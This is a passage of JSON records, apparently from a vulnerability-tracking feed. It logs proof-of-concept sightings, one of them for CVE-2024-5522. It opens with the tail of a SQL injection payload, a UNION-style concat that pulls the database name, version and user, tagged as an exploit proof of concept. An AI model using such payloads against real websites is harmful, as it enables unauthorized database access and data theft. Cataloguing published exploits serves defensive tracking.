concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -\n\n#exploit  #poc", "creation_timestamp": "2024-07-13T13:26:13.000000Z"}, {"uuid": "fb739a7b-3fa6-401c-8417-f955f21d3eab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-5522", "type": "published-proof-of-concept", "source": "Telegram/7oOON9wm4NLnsXexvwBOz9yoySkEPdgruSbrD_1iUtAwK4A", "content": "", "creation_timestamp": "2024-09-11T10:28:46.000000Z"}]}